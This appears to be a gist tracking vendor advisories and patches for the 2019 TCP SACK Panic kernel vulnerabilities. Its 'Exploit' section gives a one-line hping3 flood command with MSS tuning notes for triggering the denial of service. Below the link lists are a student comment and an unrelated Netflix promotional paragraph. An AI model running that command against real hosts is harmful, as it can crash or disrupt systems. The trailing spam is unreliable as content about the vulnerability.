Tracking vendors responses to TCP SACK vulnerabilities

20190618-TLP-WHITE-TCPSACK.MD

Advisory

Netflix has identified several TCP networking vulnerabilities in FreeBSD and Linux kernels.

Details:

See the netflix information security advisory:

• https://github.com/Netflix/security-bulletins/blob/master/advisories/third-party/2019-001.md

Exploit

sudo hping3 yourhost --tcp-mss 20 -S --flood

Nota:

• Seems only working on destination:0
• Recommended MSS value: 48

Source: https://twitter.com/joeubuntu/status/1141445492104019968?s=21

TRACK responses

Amazon AWS

• https://aws.amazon.com/security/security-bulletins/AWS-2019-005/
• https://alas.aws.amazon.com/ALAS-2019-1222.html (Linux 1)
• https://alas.aws.amazon.com/AL2/ALAS-2019-1222.html (Linux 2)

Arch

• https://security.archlinux.org/AVG-983
• https://security.archlinux.org/CVE-2019-11477
• https://security.archlinux.org/CVE-2019-11478
• https://security.archlinux.org/CVE-2019-11479

CHECKPOINT

• https://supportcenter.us.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk156192&t=1560933934963

CloudLinux OS

• https://www.cloudlinux.com/cloudlinux-os-blog/entry/don-t-panic-about-tcp-sack-panic-we-re-working-on-it

CoreOS

• https://coreos.com/releases/#2079.6.0

Debian

• https://www.debian.org/security/2019/dsa-4465
• https://security-tracker.debian.org/tracker/CVE-2019-11477
• https://security-tracker.debian.org/tracker/CVE-2019-11478
• https://security-tracker.debian.org/tracker/CVE-2019-11479

DenyAll

• https://documentation.denyall.com/plugins/servlet/mobile?contentId=9739713#content/view/9739713

EngineYard

• https://support.cloud.engineyard.com/hc/en-us/articles/360024889434-MSS-and-SACK-Panic

ExtremeNetworks

• https://gtacknowledge.extremenetworks.com/articles/Solution/000040133

F5 solutions

• https://support.f5.com/csp/article/K78234183

Fedora

• https://bodhi.fedoraproject.org/updates/FEDORA-2019-914542e05c
• https://bodhi.fedoraproject.org/updates/FEDORA-2019-6c3d89b3d0

Fortinet

• https://docs.fortinet.com/document/fortiauthenticator/6.0.2/release-notes/279684/resolved-issues

FreeBSD

• https://www.freebsd.org/security/advisories/FreeBSD-SA-19:08.rack.asc

Google Cloud Platform

• https://cloud.google.com/compute/docs/security-bulletins#20190618

GRSECURITY

• https://twitter.com/grsecurity/status/1140678999410188293

Microsoft

• https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv190020
• https://azure.microsoft.com/en-us/updates/update-19-06-for-azure-sphere-public-preview-now-available-for-evaluation/
• Azure/AKS#1065
• https://azure.microsoft.com/en-us/updates/security-advisory-on-linux-kernel-tcp-vulnerabilities-for-hdinsight-clusters/

MikroTik

• https://blog.mikrotik.com/security/cve-2019-11477-cve-2019-11478-cve-2019-11479.html

Nutanix

• https://hyperhci.com/2019/06/20/nutanix-security-advisory-tcp-sack-panic-overflow-vulnerability/

Oracle Linux

• https://linux.oracle.com/errata/ELSA-2019-4686.html (RHCK kernel)
• https://linux.oracle.com/errata/ELSA-2019-4685.html (UEK5 kernel)
• https://linux.oracle.com/errata/ELSA-2019-4684.html (UEK4 kernel)

OVH

• https://www.ovh.com/fr/blog/linux-kernel-vulnerabilities-affecting-the-selective-ack-component/
• http://travaux.ovh.net/?do=details&id=39092&PHPSESSID=5a708cef0cdceb9909d8701d22f20aa5

Pulse Secure

• https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44193

Red Hat / CentOS

• https://access.redhat.com/security/vulnerabilities/tcpsack
• https://access.redhat.com/security/cve/cve-2019-11477
• https://access.redhat.com/security/cve/cve-2019-11478
• https://access.redhat.com/security/cve/cve-2019-11479

SOPHOS

• https://community.sophos.com/kb/en-us/134237

SUSE / SLES

• https://www.suse.com/de-de/support/kb/doc/?id=7023928
• https://www.suse.com/c/suse-address-the-sack-panic-tcp-remote-denial-of-service-attacks/
• https://www.suse.com/security/cve/CVE-2019-11477/
• https://www.suse.com/security/cve/CVE-2019-11478/
• https://www.suse.com/security/cve/CVE-2019-11479/

Ubuntu

• https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/SACKPanic
• https://people.canonical.com/~ubuntu-security/cve/2019/CVE-2019-11477.html
• https://people.canonical.com/~ubuntu-security/cve/2019/CVE-2019-11478.html
• https://people.canonical.com/~ubuntu-security/cve/2019/CVE-2019-11479.html

VYOS

• https://blog.vyos.io/cve-2019-11477-tcp-sack-panic-and-an-intel-i40e-driver-issue

Hi, I am a MSc student in Computer Science and I need to submit an article with the theme: SACK Panic, but I did not find any article or tutorial on how to simulate this attack using a virtual machine, in this work I need to simulate this SACK attack on VirtualBOX, can anyone help? Thanks.

Netflix is a popular streaming service that provides access to a wide variety of TV shows, movies, documentaries, and more. It was founded in 1997 in California, USA, and now operates in over 190 countries around the world. With a Netflix subscription, users can watch an unlimited amount of content on demand, without the need for commercials or interruptions. The service offers a diverse range of programming, including original content produced by Netflix itself, as well as licensed content from other studios and distributors.
Cloud Consulting Services